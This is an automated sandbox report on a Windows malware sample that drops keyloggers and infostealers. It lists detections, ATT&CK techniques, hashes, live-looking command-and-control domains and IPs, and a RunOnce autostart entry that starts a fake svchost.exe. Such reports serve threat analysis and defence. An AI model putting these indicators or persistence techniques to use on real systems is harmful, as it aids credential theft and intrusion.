Source: Yara match | File source: 00000025.00000002.490909756.0000000000A7A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPED
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D80E9E bind,
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D80A8E listen,
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D80A50 listen,
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D80E6B bind,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Replication Through Removable Media 1 | Windows Management Instrumentation 231 | DLL Side-Loading 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 21 | OS Credential Dumping 1 | Peripheral Device Discovery 1 | Replication Through Removable Media 1 | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Application Shimming 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 11 | File and Directory Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 1 | Windows Service 1 | Application Shimming 1 | Obfuscated Files or Information 3 | Security Account Manager | System Information Discovery 135 | SMB/Windows Admin Shares | Input Capture 11 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Service Execution 2 | Registry Run Keys / Startup Folder 11 | Access Token Manipulation 1 | Software Packing 1 | NTDS | Query Registry 1 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Windows Service 1 | Timestomp 1 | LSA Secrets | Security Software Discovery 261 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 2 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Process Injection 111 | DLL Side-Loading 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 17 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 113 | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Registry Run Keys / Startup Folder 11 | Masquerading 221 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 17 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 1 | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 111 | Network Sniffing | System Network Configuration Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories 1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

                        Behavior Graph

[Behavior graph: ID 363869, Sample: Mixed Items.exe, Startdate: 05/03/2021, Architecture: WINDOWS, Score: 100]

                        Screenshots

                        Thumbnails


                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

Source | Detection | Scanner | Label
Mixed Items.exe | 17% | ReversingLabs | ByteCode-MSIL.Downloader.Generic

                        Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\origigoods20.exe | 100% | Avira | TR/Spy.Gen8
C:\Users\user\AppData\Local\Temp\origigoods40.exe | 100% | Avira | TR/Spy.Gen8
C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | 100% | Avira | TR/Redcap.jajcu
C:\Users\user\AppData\Local\Temp\hawkgoods.exe | 100% | Avira | TR/AD.MExecute.lzrac
C:\Users\user\AppData\Local\Temp\hawkgoods.exe | 100% | Avira | SPR/Tool.MailPassView.473
C:\Users\user\AppData\Local\Temp\origigoods20.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\origigoods40.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\hawkgoods.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Purchase Order.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | 54% | Metadefender |
C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | 90% | ReversingLabs | ByteCode-MSIL.Trojan.MatiexKeylogger
C:\Users\user\AppData\Local\Temp\hawkgoods.exe | 96% | ReversingLabs | ByteCode-MSIL.Trojan.Golroted
C:\Users\user\AppData\Local\Temp\origigoods20.exe | 43% | Metadefender |
C:\Users\user\AppData\Local\Temp\origigoods20.exe | 93% | ReversingLabs | ByteCode-MSIL.Infostealer.DarkStealer
C:\Users\user\AppData\Local\Temp\origigoods40.exe | 43% | Metadefender |
C:\Users\user\AppData\Local\Temp\origigoods40.exe | 86% | ReversingLabs | ByteCode-MSIL.Infostealer.DarkStealer
C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic

                        Unpacked PE Files

Source | Detection | Scanner | Label
25.2.Mixed Items.exe.4031bf.3.unpack | 100% | Avira | TR/Inject.vcoldi
30.2.hawkgoods.exe.4c0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
30.2.hawkgoods.exe.4c0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
33.2.origigoods20.exe.e50000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
33.0.origigoods20.exe.e50000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
31.0.Matiexgoods.exe.4d0000.0.unpack | 100% | Avira | TR/Redcap.jajcu
30.0.hawkgoods.exe.4c0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
30.0.hawkgoods.exe.4c0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
36.2.origigoods40.exe.160000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
31.2.Matiexgoods.exe.4d0000.0.unpack | 100% | Avira | TR/Redcap.jajcu
36.0.origigoods40.exe.160000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
25.2.Mixed Items.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
25.2.Mixed Items.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
25.2.Mixed Items.exe.400000.0.unpack | 100% | Avira | TR/Redcap.jajcu
25.2.Mixed Items.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen

                        Domains

                        No Antivirus matches

                        URLs

Source | Detection | Scanner | Label
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5120AB9D8EED6517DE7E81CD470A03B1.html | 0% | Avira URL Cloud | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C391B584FB3EF0C3E1226CABE1FDCB1.html | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-- | 0% | Avira URL Cloud | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C7589177DBC0A00C03B00FCEDE09850.html | 0% | Avira URL Cloud | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CADB725393BA475AD7E7466656748C83.html | 0% | Avira URL Cloud | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrardset_CurrentDirectory-liverpo | 0% | Avira URL Cloud | safe
http://checkip.dyndns.org/ | 0% | Avira URL Cloud | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC805D8F9D665A8AE96BD3B687F20834.html | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-EBDA9D3C78F7FA5DA1492447CFEEA8B3.html | 0% | Avira URL Cloud | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1031025574F544F1BD64E20EEEC4AAC7.html | 0% | Avira URL Cloud | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ACE03D270F49949C304CBC49EDC5CEFA.html | 0% | Avira URL Cloud | safe

                        Domains and IPs

                        Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
whatismyipaddress.com | 104.16.155.36 | true | false | | high
feromo.duckdns.org | 185.157.161.113 | true | true | | unknown
freegeoip.app | 172.67.188.154 | true | false | | unknown
liverpoolofcfanclub.com | 104.21.31.39 | true | true | | unknown
checkip.dyndns.com | 216.146.43.70 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
157.184.7.0.in-addr.arpa | unknown | unknown | true | | unknown

                                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5120AB9D8EED6517DE7E81CD470A03B1.html | true | Avira URL Cloud: safe | unknown
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C391B584FB3EF0C3E1226CABE1FDCB1.html | true | Avira URL Cloud: safe | unknown
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C7589177DBC0A00C03B00FCEDE09850.html | true | Avira URL Cloud: safe | unknown
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CADB725393BA475AD7E7466656748C83.html | true | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | Avira URL Cloud: safe | unknown
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC805D8F9D665A8AE96BD3B687F20834.html | true | Avira URL Cloud: safe | unknown
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-EBDA9D3C78F7FA5DA1492447CFEEA8B3.html | true | Avira URL Cloud: safe | unknown
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1031025574F544F1BD64E20EEEC4AAC7.html | true | Avira URL Cloud: safe | unknown
http://whatismyipaddress.com/ | false | | high
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ACE03D270F49949C304CBC49EDC5CEFA.html | true | Avira URL Cloud: safe | unknown

                                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000A.00000002.550176281.0000000005536000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.549247252.0000000005C06000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000A.00000002.533087278.0000000004617000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-- | Mixed Items.exe | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmp | false | | high
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrardset_CurrentDirectory-liverpo | Mixed Items.exe | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | svchost.exe, 00000006.00000002.527814462.000001FC10A00000.00000002.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000A.00000002.533087278.0000000004617000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000A.00000002.550176281.0000000005536000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.549247252.0000000005C06000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmp | false | | high
https://login.yahoo.com/config/login | hawkgoods.exe | false | | high
http://www.nirsoft.net/ | AdvancedRun.exe, AdvancedRun.exe, 00000009.00000000.266715806.000000000040C000.00000002.00020000.sdmp, hawkgoods.exe | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000A.00000002.524606863.00000000044D1000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.517492550.0000000004BA1000.00000004.00000001.sdmp | false | | high

                                                            Contacted IPs


                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.16.155.36 | whatismyipaddress.com | United States | 13335 | CLOUDFLARENETUS | false
216.146.43.70 | checkip.dyndns.com | United States | 33517 | DYNDNSUS | false
185.157.161.113 | feromo.duckdns.org | Sweden | 197595 | OBE-EUROPEObenetworkEuropeSE | true
104.21.31.39 | liverpoolofcfanclub.com | United States | 13335 | CLOUDFLARENETUS | true
172.67.188.154 | freegeoip.app | United States | 13335 | CLOUDFLARENETUS | false

                                                            Private

                                                            IP
                                                            192.168.2.1
                                                            127.0.0.1

                                                            General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 363869
Start date: 05.03.2021
Start time: 14:26:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 18m 36s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Mixed Items.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@52/33@22/7
EGA Information: Failed
                                                            HDC Information:
                                                            • Successful, ratio: 97.8% (good quality ratio 93.5%)
                                                            • Quality average: 82.9%
                                                            • Quality standard deviation: 26%
                                                            HCA Information:
                                                            • Successful, ratio: 92%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe
                                                            • TCP Packets have been reduced to 100
                                                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 51.104.139.180, 13.64.90.137, 104.43.193.48, 23.211.6.115, 8.241.121.126, 8.248.145.254, 8.241.9.126, 67.26.83.254, 8.241.9.254, 104.43.139.144, 52.255.188.83, 168.61.161.212, 184.30.20.56, 20.82.210.154, 92.122.213.194, 92.122.213.247, 20.54.26.129, 51.11.168.160
                                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/363869/sample/Mixed Items.exe

                                                            Simulations

                                                            Behavior and APIs

Time | Type | Description
14:27:17 | API Interceptor | 2x Sleep call for process: Mixed Items.exe modified
14:27:40 | API Interceptor | 2x Sleep call for process: svchost.exe modified
14:27:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce tvQKHpPrzFBMmr explorer.exe "C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe"
14:28:01 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce tvQKHpPrzFBMmr explorer.exe "C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe"
14:28:18 | API Interceptor | 492x Sleep call for process: Purchase Order.exe modified
14:28:39 | API Interceptor | 5x Sleep call for process: hawkgoods.exe modified
14:28:59 | API Interceptor | 67x Sleep call for process: powershell.exe modified
14:29:01 | API Interceptor | 145x Sleep call for process: origigoods20.exe modified
14:29:18 | API Interceptor | 9x Sleep call for process: origigoods40.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

Match | Associated Sample Name / URL | Detection | Context
104.16.155.36 | Sample_B.exe | malicious | whatismyipaddress.com/
| PO_Invoices_pdf.exe | malicious | whatismyipaddress.com/
| Orders.exe | malicious | whatismyipaddress.com/
| nzGUqSK11D.exe | malicious | whatismyipaddress.com/
| PO 2010029_pdf Quotation from Alibaba Ale.exe | malicious | whatismyipaddress.com/
| PO 2010029_pdf Quotation from Alibaba Ale.exe | malicious | whatismyipaddress.com/
| hkaP5RPCGNDVq3Z.exe | malicious | whatismyipaddress.com/
| NDt93WWQwd089H7.exe | malicious | whatismyipaddress.com/
| PURCHASE ORDER.exe | malicious | whatismyipaddress.com/
| BANK-STATMENT _xlsx.exe | malicious | whatismyipaddress.com/
| INQUIRY.exe | malicious | whatismyipaddress.com/
| Prueba de pago.exe | malicious | whatismyipaddress.com/
| mR3CdUkyLL.exe | malicious | whatismyipaddress.com/
| 6JLHKYvboo.exe | malicious | whatismyipaddress.com/
| jSMd8npgmU.exe | malicious | whatismyipaddress.com/
| RXk6PjNTN8.exe | malicious | whatismyipaddress.com/
| 9vdouqRTh3.exe | malicious | whatismyipaddress.com/
| 5pB35gGfZ5.exe | malicious | whatismyipaddress.com/
| fyxC4Hgs3s.exe | malicious | whatismyipaddress.com/
| yk94P18VKp.exe | malicious | whatismyipaddress.com/

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match values: feromo.duckdns.org, liverpoolofcfanclub.com, whatismyipaddress.com, freegeoip.app

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match values: DYNDNSUS, CLOUDFLARENETUS, OBE-EUROPEObenetworkEuropeSE

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match values: 54328bd36c14bd82ddaa0c04b25ed9ad

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match values: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 4096
Entropy (8bit): 0.5967038728698416
Encrypted: false
SSDEEP: 6:balEk1GaD0JOCEfMuaaD0JOCEfMKQmD1JtAl/gz2cE0fMbhEZolrRSQ2hyYIIT:baNGaD0JcaaD0JwQQ1JtAg/0bjSQJ
MD5: 8FBEB3EE575D3BBA44369DDECCA49083
SHA1: 8091ECF8CBF1A04AAEE7BF5C231C7605D8F8DAC0
SHA-256: 95D82888783EA084631ADCFBB236A44236D02A8088F04376AD017E9872EBC967
SHA-512: A51ACB1EF5483FE64293992818201966FA063D3DD36DC67E74EF27EA5443B7E93A1A51485D0C67233BBF0A322949B9FEFD244C8AA60DCA5B48248A330D4F1745
Malicious: false

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xe423063f, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.09585293764386119
Encrypted: false
SSDEEP: 12:d40+jRsXO4blof+8KH40+jRsXO4blof+8K:dH2fuH2f
MD5: 7369A0D21D0345333864DF57AC91E792
SHA1: 4735E40732F7147A9FC47F59338F29FD2812F0B3
SHA-256: 217612B92D702BCF7D388AAAFE46F93481793216F8A9428A02CBDBE4540C4DC5
SHA-512: B2A5411F24F414778F003DC15665E1B9853B623E6E79CC23E7239662DC4FCD0671D951A510FEBE646C7FA5F745BADFDCB4E14B8936582351A5FEF7D2FD69EE22
Malicious: false
                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8192
                                                                                                    Entropy (8bit):0.11057603056041983
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:h5G1EvNwr+q8l/bJdAtiVFMgerltAll:PXHq8t4E+A
                                                                                                    MD5:476D0CB871276EDB31AF5710A70C8768
                                                                                                    SHA1:EFD8C0036892FC78E9C9E6B2852CCE084C415544
                                                                                                    SHA-256:56A70A0A16A503D1624A38ACF08AF8A7654E9999A3611A3173A48B61BD280324
                                                                                                    SHA-512:5696AF6ACFFBAA8E029DFD0CAAB3DE1475C6405DD6ACB9538EABBDB472EF82B65E4CE8ADB4D5EBE75604000E45BE415E955BA43E450F48C67F228610F23FF5A6
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                                    Category:dropped
                                                                                                    Size (bytes):58596
                                                                                                    Entropy (8bit):7.995478615012125
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):326
                                                                                                    Entropy (8bit):3.1108462043257137
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kK7H/kwTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:AwTJ6HkPlE99SNxAhUe0ht
                                                                                                    MD5:2355411028ACE02098EA05A848FF008B
                                                                                                    SHA1:2EDE017C6C12FD81FFFF0D987603C38FF0BF634D
                                                                                                    SHA-256:E16245600378AE119A841A1136ECBE5ECD6E5960AA1D9322DEAD68CD7EE199D4
                                                                                                    SHA-512:3DCD4EFC903F2C57FBA66895F7A05C4A7ADA1E9239644EBC7478C9C5EF9BBC570A2B43EB0D65683E18AE22E184B5B5E7D392FAD57EA53939A3940309FF3194A2
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Mixed Items.exe.log
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):1216
                                                                                                    Entropy (8bit):5.355304211458859
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4Ks2f84jE4KnKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7r1qE4KE4j:MxHKXfvjHKnYHKhQnoPtHoxHhAHKzvrx
                                                                                                    MD5:4DC448082AFF363E7DB48FE0F4564674
                                                                                                    SHA1:BA956788D8EABC88D02119AC4B36EB16D26A2CA5
                                                                                                    SHA-256:0B882DACEECB3378A361B929BFF23F06DDAF5BEEF047B4BA87E8494C86899870
                                                                                                    SHA-512:0C3CC129DEAE19CC08E921E9A4C725D924539AAC2235D3FFFF6B270348E87A41318A1240C8D03422F62DB4728181BCBAC5CC7B216EE5DC34BA446F2A7233F1CE
                                                                                                    Malicious:true
                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b880
